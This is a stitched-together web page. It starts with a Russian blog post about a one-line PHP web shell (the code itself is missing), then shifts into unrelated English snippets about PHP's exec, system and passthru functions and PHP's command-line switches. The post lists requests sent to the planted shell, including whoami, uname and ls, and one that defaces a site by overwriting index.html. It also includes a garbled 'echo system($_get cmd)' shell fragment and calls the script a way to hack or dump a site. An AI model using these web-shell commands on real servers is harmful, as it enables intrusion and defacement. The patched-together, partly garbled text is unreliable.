Однострочный PHP-скрипт для получения Shell-a.
, я слышал, как кто-то что-то упоминал об однострочном PHP-скрипте, по сути представляющем собою Shell. Я предположил, что написание такого скрипта не составит особого труда, поскольку он представляет собою всего одну строку. Поиск информации в Гугле не принёс больших результатов, возможно потому, что это слишком легко, или я использовал неправильные условия поиска. В любом случае, я забыл о скрипте на некоторое время. до сих пор.
Поскольку в настоящее время я изучаю PHP, меня интересует безопасность Web-приложений.
Обучение пока не закончено, но сегодня (при чтении о том, как вводить данные, прежде чем использовать “include”) я вспомнил об использовании однострочного PHP-скрипта.
Вот что у меня получилось:
Очевидно, web-приложение должно быть в некотором роде уязвимым, чтобы имелась возможность поместить этот сценарий на сервер. Как только уязвимость будет найдена, скрипт потенциально может быть использован для взлома сайта или создания его дампа.
Выходные данные скрипта -это просто текст, а не документ HTML. Поэтому, если вы используете веб-браузер, для просмотра результата необходимо смотреть исходный код страницы.
Я использовал shell_exec() вместо Just exec (), потому что он возвращает каждую строку вместо последней. Альтернативой является использование passthru (), который также будет отправлять двоичные данные. Но, чтобы получить и правильно работать с двоичными данными, придется также установить заголовки, что делает скрипт многострочным.
Я смог запустить команды unix (команды windows также должны работать, если хост работает под управлением windows) такие как:
- shell.php?e=whoami
- shell.php?e=pwd
- shell.php?e=uname%20-a (I had to URL encode the spaces otherwise my browser thought it should search using google)
- shell.php?e=echo%20This%20site%20has%20been%20hacked%3Eindex.html
- shell?e=ls%20-l%20/tmp
System Command Execution through PHP Echo with $_GET Variable
To use PHP from the command line on Windows with the CLI version, replace «php» with «php.exe». Remember to include a semicolon at the end of the line to avoid a syntax error. To execute code from the command line, there are two switches available using the «php» command. The «-r» switch can be used to output and return results, as demonstrated above. Another option is to use the «php -a» switch, which is not as advanced as phpsh but still useful for those who do not want to install an interactive shell for PHP with features like tab completion and history.
Php echo system($_get ‘cmd’ )
php execute command and display output
They have slightly different purposes :- 1. exec() is for calling a system command, and perhaps dealing with the output yourself. 2. system() is for executing a system command and immediately displaying the output - presumably text. 3. passthru() is for executing a system command which you wish the raw return from - presumably something binary. Regardless, I suggest you not use any of them. They all produce highly unportable code.
How to run cmd commands in php (exec/system)
I am attempting to execute cmd commands and systems through PHP code, but I am not receiving any output. Do I need to enable any settings in php.ini for this to work?
The execution of exec() depends on the content that is written inside it. However, it is important to note that this command can only be executed on the server side and not on the client side.
To utilize this command, you can write to check the ping of Google, and the outcome will appear on your browser page. Alternatively, use shell_exec(«ping google.com»); to view more details. For instance, shell_exec(‘systeminfo | findstr /B /C:»OS Name»‘); can be used to display your operating system. Another way to use this command is by creating a bat file named «Simple.bat» and saving it on the root of your website. Then, use to call it. If you are facing issues while running IIS, the root cause could be something within your settings. There are numerous causes for this, and as I do not have experience with IIS, I can only suggest that you check out the first reply in this link: https://forums.iis.net/t/1216283.aspx.
Php from cmd Code Example, All Languages >> PHP >> Yii >> php from cmd “php from cmd” Code Answer’s. server cmd php . php by Manueljcmatos on Jan 15 2021 Donate Comment . 0. how to execute cmd command in php . php by Annoying Aardvark on Nov 06
How can I execute PHP code from the command line?
I’m interested in running PHP statement easily through the command line, without the need for a distinct PHP file. This can be done by using if(function_exists(«my_func»)) echo ‘function exists’; .
For an enjoyable experience while doing PHP in the command line, I suggest installing phpsh. It is a good PHP shell that you can use.
In any case, the php instruction presents a pair of toggles that enable the execution of code through the command line.
-r Run PHP without using script tags -R Run PHP for every input line Utilize the -r switch of php to accomplish the following:
php -r 'echo function_exists("foo") ? "yes" : "no";' The PHP command mentioned previously should generate no as output and 0 as the returned result, as demonstrated.
>>> php -r 'echo function_exists("foo") ? "yes" : "no";' no >>> echo $? # print the return value of the previous command 0 An additional amusing toggle that can be utilized is the command: php -a.
-a Run as interactive shell The tool may not be as impressive as phpsh, but in case you prefer not to install interactive shell for php developed by Facebook which offers features like tab completion and history, you can simply use -a.
>>> php -a Interactive shell php > echo function_exists("foo") ? "yes" : "no"; no php > In case the program fails to function properly on your system, but it does on mine (I have tested it on Ubuntu and Arch Linux), it is likely that your PHP configuration is either faulty or incomplete. To confirm this, you can execute the following command:
Some recommendations for you to consider checking out are:
Server API => Command Line Interface In case the CLI SAPI is not accessible through a specific command, it’s possible that it can be provided by another command. You can try using php-cli which may be available as a package or command in your operating system.
In case you notice that your php command is executed through the SAPI (Server API) CLI (command-line interface), you can determine the particular switch that enables code execution in your version/setup by running php -h | grep code . It’s worth noting that this switch has remained unchanged for a long time.
To ensure its functionality on my boxes, here are a few additional instances.
>>> php -r 'echo function_exists("sg_load") ? "yes" : "no";' no >>> php -r 'echo function_exists("print_r") ? "yes" : "no";' yes It should be noted that an extension may be loaded in the CLI but not in the CGI or Apache SAPI. Additionally, various PHP SAPIs are likely to use different php.ini files, such as /etc/php/cli/php.ini , /etc/php/cgi/php.ini , and /etc/php/apache/php.ini on a Gentoo Linux system. To determine which ini file is being used, utilize php -i | grep ini .
For Windows users utilizing the CLI version alongside -r , it is recommended to opt for » over ‘ .
Correct
Incorrect
PHP Parse error: syntax error, unexpected ''echo' (T_ENCAPSED_AND_WHITESPACE), expecting end of file in Command line code on line 1 Remember to use a semicolon to end the line; otherwise, you will receive a PHP Parse error message, which reads «syntax error, unexpected end of file, expecting ‘;’ or ‘,’ in Command line code on line 1».
The final «;» is a must, but you may or may not use the optional «?>» for closing tag.
php -i | grep sourceguardian You’ll receive text only when it’s available, otherwise, you’ll get nothing.
Php system result echo into screen Code Example, They have slightly different purposes :- 1. exec() is for calling a system command, and perhaps dealing with the output yourself. 2. system() is for executing a system command and immediately displaying the output — presumably text. 3. passthru() is for executing a system command which you wish the raw return from — …